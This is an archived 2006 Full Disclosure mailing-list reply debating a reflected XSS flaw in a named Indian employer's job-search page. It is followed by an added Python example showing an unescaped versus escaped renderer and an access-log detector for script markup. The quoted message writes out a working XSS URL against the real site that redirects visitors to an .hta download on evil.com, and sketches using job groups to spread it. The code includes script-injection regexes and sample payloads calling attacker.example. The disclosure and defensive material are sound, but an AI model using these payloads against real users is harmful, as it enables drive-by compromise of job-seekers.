Full Disclosure mailing list archives
Re: MBT Xss vulnerability
From: "Native.Code" <native.code () gmail com>
Date: Sun, 22 Jan 2006 23:56:32 +0800
Nice discussion guys. Perhaps I should have mentioned that XSS about every site should not be posted to FD. And MBT does *not* attract millions of job-seekers. It is an Indian employer, and IT job-seekers in India, at any given time, should not be more than one million. I believe most of the subscribers on this list did not have to know this XSS. It should have been better reported to the IT team at MBT.

Best.

On 1/21/06, MuNNa <sant.jadhav () gmail com> wrote:
Hii Bro, I got the point. You meant to say that XSS for each and every site should not be posted here, unless and until it attracts heavy traffic like Yahoo etc. I agree with this, that MBT doesn't attract that amount of traffic normally, but you can target millions of users at one go. Like say... there are many groups that post new job vacancies every day. So if I create a URL with JavaScript allowing you to download a file with, say, a .hta extension, and it claims itself to be some form that has to be filled in by the victim in order to apply for a job. For example:

http://www.mahindrabt.com/jse/jsp/search.jsp?q=<script>document.location='www.evil.com/applicationform.hta'</script>

If you post this URL in any of the above groups, you can be sure that your file will be downloaded by thousands of users. This is because MBT is one of the top employers. Believe me. Before someone downloads such files and gets his machine compromised, I just wanted to warn the users. As the number of victims could be large enough to create havoc, MBT's XSS vuln was of great concern to me. This is what made me post this vuln over here. Maybe I might have posted it in the wrong list. If this is the case, I am sorry to cause annoyance to you and others.

Regards,
Santosh J.

_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
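The defect the thread is arguing about is a search parameter reflected into the page without encoding, and the risk is that a crafted link carrying that parameter runs script in the visitor's browser. The following Python example is added here and is not code from the list thread or from MBT; it shows the vulnerable reflection beside its hardened form (HTML-escaping the `q` value before it is written into the page), and a small detector that scans web-server access log lines for script markup in the same parameter. The log lines, IP addresses and the `attacker.example` host are constructed for the example; the `/jse/jsp/search.jsp?q=` path is the one quoted in the thread.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# --- Mitigation: how the search page should reflect the parameter -----------

def render_search_vulnerable(q: str) -> str:
    """Reflects the raw parameter into HTML (the defect discussed in the thread)."""
    return f"<p>Results for: {q}</p>"

def render_search_hardened(q: str) -> str:
    """Reflects the parameter after HTML-escaping it, so any markup in it
    becomes inert text instead of being parsed by the browser."""
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"

# --- Detection: spot injection attempts in access logs ----------------------

# Markers that have no business appearing in a job-search keyword.
SCRIPT_MARKERS = re.compile(
    r"<\s*/?\s*script|javascript:|document\.location|on\w+\s*=",
    re.IGNORECASE,
)

# Common Log Format request line, e.g. "GET /path?x=y HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def extract_q(request_target: str):
    """Return the percent-decoded value of the q parameter, or None if absent."""
    query = urlsplit(request_target).query
    values = parse_qs(query, keep_blank_values=True).get("q", [])
    return values[0] if values else None

def flag_suspicious_requests(log_lines):
    """Return (client_ip, decoded_q) for every request whose q parameter
    contains script markup. Plain keyword searches are not reported."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        q = extract_q(m.group(1))
        if q is None:
            continue
        if SCRIPT_MARKERS.search(q):
            client_ip = line.split(" ", 1)[0]
            hits.append((client_ip, q))
    return hits

# Constructed sample log lines (not real traffic); the second one carries the
# kind of payload described in the thread, percent-encoded as a browser sends it.
LOG_LINES = [
    '203.0.113.5 - - [21/Jan/2006:10:00:01 +0530] '
    '"GET /jse/jsp/search.jsp?q=java+developer HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/Jan/2006:10:00:02 +0530] '
    '"GET /jse/jsp/search.jsp?q=%3Cscript%3Edocument.location%3D'
    '%27http://attacker.example/applicationform.hta%27%3C/script%3E HTTP/1.1" 200 5120',
    '203.0.113.9 - - [21/Jan/2006:10:00:03 +0530] '
    '"GET /jse/jsp/index.jsp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    payload = "<script>document.location='http://attacker.example/x.hta'</script>"
    print("vulnerable:", render_search_vulnerable(payload))
    print("hardened:  ", render_search_hardened(payload))
    for ip, q in flag_suspicious_requests(LOG_LINES):
        print(f"suspicious request from {ip}: {q!r}")
```

The hardened renderer is the fix the thread says should have gone to MBT's IT team: escaping at the point where untrusted data meets HTML. The detector is the complementary check an operator can run over existing logs to see whether such links are already being circulated; it decodes the query string first, because the markup arrives percent-encoded and a plain `grep` for `<script>` on raw log lines would miss it.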
Current thread:
- MBT Xss vulnerability MuNNa (Jan 19)
- Re: MBT Xss vulnerability Native.Code (Jan 19)
- Re: MBT Xss vulnerability greybrimstone (Jan 19)
- Re: MBT Xss vulnerability MuNNa (Jan 20)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
- Re: MBT Xss vulnerability MuNNa (Jan 20)
- Re: MBT Xss vulnerability Morning Wood (Jan 20)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
- Re: MBT Xss vulnerability MuNNa (Jan 21)
- Re: MBT Xss vulnerability Native.Code (Jan 22)
- Re: MBT Xss vulnerability greybrimstone (Jan 19)
- Re: MBT Xss vulnerability Native.Code (Jan 19)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)